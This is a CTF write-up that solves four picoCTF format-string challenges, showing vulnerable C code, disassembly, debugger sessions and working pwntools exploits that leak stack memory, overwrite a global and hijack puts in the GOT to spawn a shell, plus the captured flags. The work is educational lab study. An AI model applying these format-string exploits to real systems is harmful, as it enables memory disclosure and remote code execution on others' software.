format string 0

It’s a 64-bit dynamically linked ELF.

file + checksec + C code

file format-string-0
format-string-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=73480d84a806aebddd86602609fcab2052c8fa13, for GNU/Linux 3.2.0, not stripped

The only security feature enabled is NX.

checksec format-string-0
[*] '/home/picoctf/pwn/format_string/format-string-0'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 32
#define FLAGSIZE 64

char flag[FLAGSIZE];

void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);
    fflush(stdout);
    exit(1);
}

int on_menu(char *burger, char *menu[], int count) {
    for (int i = 0; i < count; i++) {
        if (strcmp(burger, menu[i]) == 0)
            return 1;
    }
    return 0;
}

void serve_patrick();

void serve_bob();


int main(int argc, char **argv){
    FILE *f = fopen("flag.txt", "r");
    if (f == NULL) {
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
                        "own debugging flag.\n");
        exit(0);
    }

    fgets(flag, FLAGSIZE, f);
    signal(SIGSEGV, sigsegv_handler);

    gid_t gid = getegid();
    setresgid(gid, gid, gid);

    serve_patrick();
  
    return 0;
}

void serve_patrick() {
    printf("%s %s\n%s\n%s %s\n%s",
            "Welcome to our newly-opened burger place Pico 'n Patty!",
            "Can you help the picky customers find their favorite burger?",
            "Here comes the first customer Patrick who wants a giant bite.",
            "Please choose from the following burgers:",
            "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice1[BUFSIZE];
    scanf("%s", choice1);
    char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
    if (!on_menu(choice1, menu1, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        int count = printf(choice1);
        if (count > 2 * BUFSIZE) {
            serve_bob();
        } else {
            printf("%s\n%s\n",
                    "Patrick is still hungry!",
                    "Try to serve him something of larger size!");
            fflush(stdout);
        }
    }
}

void serve_bob() {
    printf("\n%s %s\n%s %s\n%s %s\n%s",
            "Good job! Patrick is happy!",
            "Now can you serve the second customer?",
            "Sponge Bob wants something outrageous that would break the shop",
            "(better be served quick before the shop owner kicks you out!)",
            "Please choose from the following burgers:",
            "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice2[BUFSIZE];
    scanf("%s", choice2);
    char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
    if (!on_menu(choice2, menu2, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        printf(choice2);
        fflush(stdout);
    }
}

Exploit Explanation

There are 2 format-string vulnerabilities in the code.

  1. serve_patrick function

It prints choice1 an array without a format-specifier.

char choice1[BUFSIZE];
...
int count = printf(choice1);
  1. serve_bob function

Prints choice2(an array) without a format-specifier.

char choice2[BUFSIZE];
...
printf(choice2);
void serve_patrick() {
    printf("%s %s\n%s\n%s %s\n%s",
            "Welcome to our newly-opened burger place Pico 'n Patty!",
            "Can you help the picky customers find their favorite burger?",
            "Here comes the first customer Patrick who wants a giant bite.",
            "Please choose from the following burgers:",
            "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice1[BUFSIZE];
    scanf("%s", choice1);
    char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
    if (!on_menu(choice1, menu1, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        int count = printf(choice1);
        if (count > 2 * BUFSIZE) {
            serve_bob();
        } else {
            printf("%s\n%s\n",
                    "Patrick is still hungry!",
                    "Try to serve him something of larger size!");
            fflush(stdout);
        }
    }
}

In the serve_patrick function we need to enter "Gr%114d_Cheese" which is a valid menu item.

printf(choice1) will then interpret %114d in the input as a format-specifier printing 114 spaces.

The total number of characters printed is then much longer than 2 * BUFSIZE (64).

As a result the if (count > 2 * BUFSIZE) will be selected and the program will call the serve_bob function.

void serve_bob() {
    printf("\n%s %s\n%s %s\n%s %s\n%s",
            "Good job! Patrick is happy!",
            "Now can you serve the second customer?",
            "Sponge Bob wants something outrageous that would break the shop",
            "(better be served quick before the shop owner kicks you out!)",
            "Please choose from the following burgers:",
            "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice2[BUFSIZE];
    scanf("%s", choice2);
    char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
    if (!on_menu(choice2, menu2, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        printf(choice2);
        fflush(stdout);
    }
}

Entering "Cla%sic_Che%s%steak" a valid menu2 item, will read whatever is on the stack as pointers and try to dereference them as strings.

If any of those stack values are invalid addresses, this will cause a segmentation fault.

When a segfault occurs, the sigsegv_handler function will be called and will print the flag.

void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);
    fflush(stdout);
    exit(1);
}

Exploit Code

from pwn import *

r = remote('mimas.picoctf.net', 60519)
r.sendline(f'Gr%114d_Cheese'.encode('utf-8'))
r.sendline(f'Cla%sic_Che%s%steak'.encode('utf-8'))
r.interactive()

# picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_ef312157}

I wonder what these codes were used for in the main function.

Extra Knowledge + Further Reading

gid_t gid = getegid();
setresgid(gid, gid, gid);

getegid() gets the effective group ID of the process.

setresgid(gid ,gid, gid) sets the real, effective and saved set-group-ID of the process to the effective group ID.

This code is used a lot in CTFs so that unless we get a shell we won’t have privileges to run the binary with elevated group permissions.

Before understanding egid it’s good to start of with knowing what UID and GID are and then build expand it to ruid, euid and saved user id.

Honestly I still quite don’t understand the use of saved user id and it’s existence.

format string 1

file + checksec + C code

file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped

NX is enabled.

checksec format-string-1
[*] '/home/picoctf/pwn/format_string1/format-string-1'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>


int main() {
  char buf[1024];
  char secret1[64];
  char flag[64];
  char secret2[64];

  // Read in first secret menu item
  FILE *fd = fopen("secret-menu-item-1.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(secret1, 64, fd);
  // Read in the flag
  fd = fopen("flag.txt", "r");
  if (fd == NULL){
    printf("'flag.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(flag, 64, fd);
  // Read in second secret menu item
  fd = fopen("secret-menu-item-2.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(secret2, 64, fd);

  printf("Give me your order and I'll read it back to you:\n");
  fflush(stdout);
  scanf("%1024s", buf);
  printf("Here's your order: ");
  printf(buf);
  printf("\n");
  fflush(stdout);

  printf("Bye!\n");
  fflush(stdout);

  return 0;
}

Exploit Explanation

char buf[1024];
...
scanf("%1024s", buf);
...
printf(buf);

We need to figure out which offset will leak the memory address we want.

To find the offset, we need to dive into the disassembly.

objdump -M intel -d format-string-1

The stack pointer rsp points at [rbp-0x4d0], and we can see that the flag is located at [rbp-0x490].

0x00000000004011f6 <+0>:     endbr64
0x00000000004011fa <+4>:     push   rbp
0x00000000004011fb <+5>:     mov    rbp,rsp
0x00000000004011fe <+8>:     sub    rsp,0x4d0
   ...
0x0000000000401279 <+131>:   mov    rdx,QWORD PTR [rbp-0x8]
0x000000000040127d <+135>:   lea    rax,[rbp-0x490]
0x0000000000401284 <+142>:   mov    esi,0x40
0x0000000000401289 <+147>:   mov    rdi,rax

The difference from the address of rsp to the address of flag is 0x4d0-0x490 = 64 bytes.

Since we’re leaking 64 bit address (8 bytes), we need to divide 64 / 8 = 8.

The flag is 8 positions up the stack from where rsp is pointing.

In x86-64 calling convention, printf’s first 6 arguments are taken from registers(rdi,rsi,rdx,rcx,r8,r9).

The 7th argument and so on are taken from the stack.

To get the offset we want 7(the index of the first stack argument) + 8(our calculated) distance = 15.

I initially thought that 15 was the offset of the pointer that leaked the flag, but it actually wasn’t.

It was actually 14 and not 15.

nc mimas.picoctf.net 56575
Give me your order and I'll read it back to you:
%15$p
Here's your order: 0x355f31346d316e34
Bye!
from pwn import *
p64(0x355f31346d316e34)
b'4n1m41_5'
nc mimas.picoctf.net 56575
Give me your order and I'll read it back to you:
%14$p
Here's your order: 0x7b4654436f636970
Bye!
from pwn import *
p64(0x7b4654436f636970)
b'picoCTF{'

Then was my calculation bogus? well, not really.

It was close, but it wasn’t exact.

This “off by one” error is very common when doing static analysis(viewing disassembly).

This usually happens because the version of libc might start reading stack arguments from rsp+8 instead of rsp, or have other small variations in how it sets up the stack for variadic functions like printf.

Another reason could be that the compiler might have pushed an extra hidden value onto the stack for alignment or other purposes, shifting everything by one position.

Gemini told me why this “off by one” error occurs. I haven’t found any articles or posts online explaining the reason why lol.

I still believe it’s better to use the method above than to send a whole bunch of %ps.

The majority of the writeups I found sent a bunch of %ps but to me it doesn’t seem to be a good approach to solve this problem.

One tip would be to check N-1 (%N-1$p), N (%N$p) and N+1 (%N+1$p) and so on if the offset calculated is N.

We now know the starting offset, but is there a way to find the offset for the end of the memory leak?

Yup. remember that the flag was 64 bytes? char flag[64];.

By dividing 64 / 8 = 8 we can know for certain that the flag will end at least before %22$p.

nc mimas.picoctf.net 50538
Give me your order and I'll read it back to you:
%14$p,%15$p,%16$p,%17$p,%18$p,%19$p,%20$p,%21$p 
Here's your order: 0x7b4654436f636970,0x355f31346d316e34,0x3478345f33317937,0x31655f673431665f,0x7d383130386531,0x7,0x7cb9cc0a58d8,0x2300000007
Bye!
0x7b4654436f636970,0x355f31346d316e34,0x3478345f33317937,0x31655f673431665f,0x7d383130386531,0x7,0x7cb9cc0a58d8,0x2300000007

If you look carefully at the address leaked in the stack, you can see that 0x7b4654436f636970, 0x355f31346d316e34, 0x3478345f33317937,0x31655f673431665f and 0x7d383130386531 all have 16 hexadecimal digits. Which means it’s 8 bytes.

I knew the flag was stored in a 64-byte buffer, so I only needed to leak and combine the first eight 8-byte chunks of memory to reconstruct it. The data that came after (0x7… etc) was simply other stack information and not part of the flag.

That means we can discard or ignore the address leaks starting from 0x7 which was %19$p.

We can send %14$p,%15$p,%16$p,%17$p,%18$p and interpret the leaked memory address to ASCII and then join them to get the flag.

Exploit Code

from pwn import *

r = remote('mimas.picoctf.net', 50538)
r.sendline(b'%14$p,%15$p,%16$p,%17$p,%18$p')
r.recvuntil(b'order: ')
leaks = r.recvline().strip(b'\n').split(b',')
# print(leaks)
flag = b''.join([p64(int(leak, 16)) for leak in leaks])
print(flag) # b'picoCTF{4n1m41_57y13_4x4_f14g_e11e8018}\x00'
r.interactive()

Using gdb

You can do the same thing in gdb as well, either way it looks like you have to be good at reading assembly and disassembly to locate which offset will leak a memory address that we want.

gef➤  disass main
Dump of assembler code for function main:
   0x00000000004011f6 <+0>:     endbr64
   0x00000000004011fa <+4>:     push   rbp
   0x00000000004011fb <+5>:     mov    rbp,rsp
   0x00000000004011fe <+8>:     sub    rsp,0x4d0
   0x0000000000401205 <+15>:    mov    esi,0x402008
   0x000000000040120a <+20>:    mov    edi,0x40200a
   0x000000000040120f <+25>:    call   0x4010f0 <fopen@plt>
   0x0000000000401214 <+30>:    mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401218 <+34>:    cmp    QWORD PTR [rbp-0x8],0x0
   0x000000000040121d <+39>:    jne    0x401233 <main+61>
   0x000000000040121f <+41>:    mov    edi,0x402028
   0x0000000000401224 <+46>:    call   0x4010b0 <puts@plt>
   0x0000000000401229 <+51>:    mov    eax,0x1
   0x000000000040122e <+56>:    jmp    0x401363 <main+365>
   0x0000000000401233 <+61>:    mov    rdx,QWORD PTR [rbp-0x8]
   0x0000000000401237 <+65>:    lea    rax,[rbp-0x450]
   0x000000000040123e <+72>:    mov    esi,0x40
   0x0000000000401243 <+77>:    mov    rdi,rax
   0x0000000000401246 <+80>:    call   0x4010d0 <fgets@plt>
   0x000000000040124b <+85>:    mov    esi,0x402008
   0x0000000000401250 <+90>:    mov    edi,0x40205b
   0x0000000000401255 <+95>:    call   0x4010f0 <fopen@plt>
   0x000000000040125a <+100>:   mov    QWORD PTR [rbp-0x8],rax
   0x000000000040125e <+104>:   cmp    QWORD PTR [rbp-0x8],0x0
   0x0000000000401263 <+109>:   jne    0x401279 <main+131>
   0x0000000000401265 <+111>:   mov    edi,0x402068
   0x000000000040126a <+116>:   call   0x4010b0 <puts@plt>
   0x000000000040126f <+121>:   mov    eax,0x1
   0x0000000000401274 <+126>:   jmp    0x401363 <main+365>
   0x0000000000401279 <+131>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x000000000040127d <+135>:   lea    rax,[rbp-0x490]
   0x0000000000401284 <+142>:   mov    esi,0x40
   0x0000000000401289 <+147>:   mov    rdi,rax
   0x000000000040128c <+150>:   call   0x4010d0 <fgets@plt>
   0x0000000000401291 <+155>:   mov    esi,0x402008
   0x0000000000401296 <+160>:   mov    edi,0x40208d
   0x000000000040129b <+165>:   call   0x4010f0 <fopen@plt>
   0x00000000004012a0 <+170>:   mov    QWORD PTR [rbp-0x8],rax
   0x00000000004012a4 <+174>:   cmp    QWORD PTR [rbp-0x8],0x0
   0x00000000004012a9 <+179>:   jne    0x4012bf <main+201>
   0x00000000004012ab <+181>:   mov    edi,0x4020a8
   0x00000000004012b0 <+186>:   call   0x4010b0 <puts@plt>
   0x00000000004012b5 <+191>:   mov    eax,0x1
   0x00000000004012ba <+196>:   jmp    0x401363 <main+365>
   0x00000000004012bf <+201>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x00000000004012c3 <+205>:   lea    rax,[rbp-0x4d0]
   0x00000000004012ca <+212>:   mov    esi,0x40
   0x00000000004012cf <+217>:   mov    rdi,rax
   0x00000000004012d2 <+220>:   call   0x4010d0 <fgets@plt>
   0x00000000004012d7 <+225>:   mov    edi,0x4020e0
   0x00000000004012dc <+230>:   call   0x4010b0 <puts@plt>
   0x00000000004012e1 <+235>:   mov    rax,QWORD PTR [rip+0x2d78]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x00000000004012e8 <+242>:   mov    rdi,rax
   0x00000000004012eb <+245>:   call   0x4010e0 <fflush@plt>
   0x00000000004012f0 <+250>:   lea    rax,[rbp-0x410]
   0x00000000004012f7 <+257>:   mov    rsi,rax
   0x00000000004012fa <+260>:   mov    edi,0x402111
   0x00000000004012ff <+265>:   mov    eax,0x0
   0x0000000000401304 <+270>:   call   0x401100 <__isoc99_scanf@plt>
   0x0000000000401309 <+275>:   mov    edi,0x402118
   0x000000000040130e <+280>:   mov    eax,0x0
   0x0000000000401313 <+285>:   call   0x4010c0 <printf@plt>
   0x0000000000401318 <+290>:   lea    rax,[rbp-0x410]
   0x000000000040131f <+297>:   mov    rdi,rax
   0x0000000000401322 <+300>:   mov    eax,0x0
   0x0000000000401327 <+305>:   call   0x4010c0 <printf@plt>
   0x000000000040132c <+310>:   mov    edi,0xa
   0x0000000000401331 <+315>:   call   0x4010a0 <putchar@plt>
   0x0000000000401336 <+320>:   mov    rax,QWORD PTR [rip+0x2d23]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x000000000040133d <+327>:   mov    rdi,rax
   0x0000000000401340 <+330>:   call   0x4010e0 <fflush@plt>
   0x0000000000401345 <+335>:   mov    edi,0x40212c
   0x000000000040134a <+340>:   call   0x4010b0 <puts@plt>
   0x000000000040134f <+345>:   mov    rax,QWORD PTR [rip+0x2d0a]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x0000000000401356 <+352>:   mov    rdi,rax
   0x0000000000401359 <+355>:   call   0x4010e0 <fflush@plt>
   0x000000000040135e <+360>:   mov    eax,0x0
   0x0000000000401363 <+365>:   leave
   0x0000000000401364 <+366>:   ret
End of assembler dump.
gef➤  b *0x000000000040128c
Breakpoint 1 at 0x40128c
gef➤  r
gef➤  ni 
gef➤  telescope
0x00007fffffffd230│+0x0000: 0x0000000000000009 ("\t"?)   ← $rsp
0x00007fffffffd238│+0x0008: 0x0000000000000000
0x00007fffffffd240│+0x0010: 0x0000000000000000
0x00007fffffffd248│+0x0018: 0x00007ffff7ffdab0  →  0x00007ffff7fc5000  →  0x03010102464c457f
0x00007fffffffd250│+0x0020: 0x00007fff3de00ec7
0x00007fffffffd258│+0x0028: 0x00007ffff7ff39d7  →  0x00636f6c6c616572 ("realloc"?)
0x00007fffffffd260│+0x0030: 0x0000000000000004
0x00007fffffffd268│+0x0038: 0x0000000000000000
0x00007fffffffd270│+0x0040: "picoCTF{hwkim301}"  ← $rax, $rcx
0x00007fffffffd278│+0x0048: "hwkim301}"


gef➤  p/d (0x00007fffffffd270-0x00007fffffffd230)/8
$1 = 8

As you see you get the same value 8 as we did using objdump.

This was the hardest problem in the entire format-string series in picoCTF.

To be honest, I found all the format-string problems hard. I actually couldn’t solve any of them during the ctf last year.

I did only have a day or two to play because I was in the army and had restricted computer access.

Even with a plethora of time I probably couldn’t have solved it back then though lol.

I haven’t found any really useful writeups for this challenge unlike other challenges.

format-string 2

file + checksec + C Code

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=dfe923d97df1df729249ff21202d10ad15d45f4c, for GNU/Linux 3.2.0, not stripped

The primary security feature that’s enabled is NX.

checksec vuln
[*] '/home/picoctf/pwn/format_string2/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

I wonder what SHSTK and IBT are.

I linked an explanation on SHSTK and IBT for those who are interested, honestly this stuff seems out of my level.

At least it’s good to know the acronyms of what SHSTK and IBT are lol!

#include <stdio.h>

int sus = 0x21737573;

int main() {
  char buf[1024];
  char flag[64];


  printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
  fflush(stdout);
  scanf("%1024s", buf);
  printf("Here's your input: ");
  printf(buf);
  printf("\n");
  fflush(stdout);

  if (sus == 0x67616c66) {
    printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");

    // Read in the flag
    FILE *fd = fopen("flag.txt", "r");
    fgets(flag, 64, fd);

    printf("%s", flag);
    fflush(stdout);
  }
  else {
    printf("sus = 0x%x\n", sus);
    printf("You can do better!\n");
    fflush(stdout);
  }

  return 0;
}

Exploit Explanation

A format string vulnerability exists in the main function.

char buf[1024];
printf(buf);

I sent a bunch of %ps like I did when solving echo_valley.

./vuln 
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
Here's your input: 0x7fff7aca0f10
sus = 0x21737573
You can do better!

Unfortunately, the binary only leaked one address.

This is because it used the scanf function to read input, which stops at the first whitespace character(space,tab,newline…)

If we send %p %p %p... it will only read until the first %p.

On the other hand the C code for echo valley used the fgets function to read input.

fgets reads the entire line including spaces, until a newline or the buffer is full.

That’s why we need to change our format-string input.

We need to make sure it doesn’t contain any whitespaces.

To ensure that I used %p. this time.

./vuln 
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
Here's your input: 0x7fff89630670.(nil).(nil).0xa.0x400.0x7f6f063ac860.0x7f6f063e4ab0.(nil).(nil).(nil).0x7f6f063e52e0.0x1a0c23d.0x7f6f063acd78.0x70252e70252e7025.
sus = 0x21737573

You can see that the 14th argument is representing the format string I passed as ASCII.

0x70252e70252e7025 is shown in reverse because x86-64 stores data in little-endian.

from pwn import * 
p64(0x70252e70252e7025) # b'%p.%p.%p'

Why is it important to find which format specifier interprets my input as ASCII?

Because the 14th pointer on the stack points to my input, I can place a target address at the beginning of that input. The %14$n specifier will then write to that target address.

From here, the rest is simple. Utilize the 14th pointer on the stack to change sus which was 0x21737573 to 0x67616c66 and read the flag.

Exploit Code

from pwn import *

context.arch = "amd64"
r = remote("rhea.picoctf.net", 61331)
e = ELF("./vuln")
payload = fmtstr_payload(14, {e.sym.sus: 0x67616c66})
r.sendline(payload)
r.interactive() 
# picoCTF{f0rm47_57r?_f0rm47_m3m_741fa290}

Reference + Further Reading

Even though I solved the problem with the help of a writeup, I wonder how you can solve it without using the fmtstr_payload.

Although,fmtstr_payload is a very good tool it’s good practice to solve format string problems manually to prepare for scenarios where it can’t be used.

1. IBT (Indirect branch technique)

2. SHSTK (Shadow Stack)

format-string 3

file + checksec + C code

file format-string-3
format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
checksec format-string-3
[*] '/home/picoctf/pwn/format_string3/format-string-3'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x3ff000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}

The code is pretty simple, it prints the memory address of the setvbuf function in libc.

There’s also a format string vulnerability.

printf(buf);

Running pwninit

In this level picoCTF gave us the libc and ld.

file libc.so.6 
libc.so.6: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib/ld-linux-x86-64.so.2, BuildID[sha1]=8bfe03f6bf9b6a6e2591babd0bbc266837d8f658, for GNU/Linux 4.4.0, stripped
file ld-linux-x86-64.so.2 
ld-linux-x86-64.so.2: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), static-pie linked, BuildID[sha1]=6ebd6e95dffa2afcbdaf7b7c91103b23ecf2b012, stripped

I ran strings to check which version of Ubuntu the binary was built on.

It looks like it was built on Ubuntu 22.04, and used glibc 2.38.

strings format-string-3 | grep GCC
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0


strings libc.so.6 | grep GNU
GNU C Library (GNU libc) stable release version 2.38.
Compiled by GNU CC version 13.2.1 20230801.
GCC: (GNU) 13.2.1 20230801

At first, I couldn’t run the binary, likely because I’m using a newer libc (Ubuntu 24.04) and ld than what the binary expected.

To fix this, I ran pwninit.

./format-string-3 
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f94d24313f0
hwkim301
hwkim301
/bin/sh

Buffering

You can see this code a lot when solving pwnable problems, but I usually ignored it.

I thought it would be worth explaining once.

setvbuf(stderr, NULL, _IONBF, 0);

There are 3 types of buffering(unbuffered, block buffered, and line buffered).

1. Unbuffered (_IONBF)

Information appears on the destination file or terminal as soon as it’s written.

Corresponds to constant 2.

2. Block buffered (_IOFBF)

many characters are saved up and written as a block

Corresponds to constant value 1.

3. Line buffered (_IOLBF)

characters are saved up until a newline is output or input is read from any stream attached to a terminal device (typically stdin).

Corresponds to constant value 0.

Normally all files are block buffered.

You can read this reddit post on why the setvbuf function is used frequently in pwnable challenges.

Exploit Explanation

The 38th pointer on the stack points to my input.

./format-string-3 
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f1bfe4e13f0
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
0x7f1bfe63f963 0xfbad208b 0x7fff250f93e0 0x1 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070
/bin/sh

Since typing a whole bunch of %ps is inconvenient and clunky, you can automate the process of finding the offset.

I got the code from here.

from pwn import *

context.arch = "amd64"


def send_payload(payload):
    p = process("./format-string-3")
    p.sendline(payload)
    l = p.recvall()
    p.close()
    return l


offset = FmtStr(send_payload).offset
info(f"offset = {offset}")

# [*] Found format string offset: 38
# [*] offset = 38

We now know the offset, and to calculate the libc base we need to subtract the setvbuf offset from the memory address of setvbuf.

Why would you do that, even if the binary isn’t compiled with PIE?

Well the libc is almost always compiled with PIE, in order to calculate the setvbuf address from libc we need to subtract the offset from the setvbuf itself to calculate the base address of libc.

checksec libc.so.6
[*] '/home/picoctf/pwn/format_string3/libc.so.6'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled

After calculating the base address of libc we need to overwrite a GOT entry of a function that will be called in the future.

puts(normal_string);

GOT & PLT

Overwriting the GOT entry of puts to the system function in libc will give us the shell.

What is the GOT and PLT?

You should read this.

Explaining thee GOT and PLT in detail is a bit hard for me…

In short, they are mechanisms that facilitate dynamic linking. For this exploit, we just need to know that the GOT contains the addresses of library functions, and because of Partial RELRO, we can overwrite them.

We can overwrite the GOT entry of the puts function because it will be called right after the printf function call.

payload = fmtstr_payload(38, {e.got['puts']: libc.symbols['system']})

Another interesting point is that although Python3 doesn’t have a default dotdict data structure the pwntools ELF class allows you to use elf.symbols to reference variables via the dotdict.

I think using a normal dict would be Pythonic since it works with other code as well but if you’re a ctfer using the dotdict would be a good choice too since it does seem a bit more smooth.

Here’s the exploit code.

Exploit Code

from pwn import *

context.arch = "amd64"
r = remote("rhea.picoctf.net", 50053)
e = ELF("./format-string-3")
libc = ELF("./libc.so.6")
setvbuf = r.recvuntil(b"libc: ")
libc.address = int(r.recvline(), 16) - libc.symbols['setvbuf']
payload = fmtstr_payload(38, {e.got['puts']: libc.symbols['system']})
r.sendline(payload)
r.interactive()

# picoCTF{G07_G07?_6d11af9f}

Reference writeup + Extra Reading

ELF symbols and dotdicts in pwntools

RELRO (ReLocation Read-Only)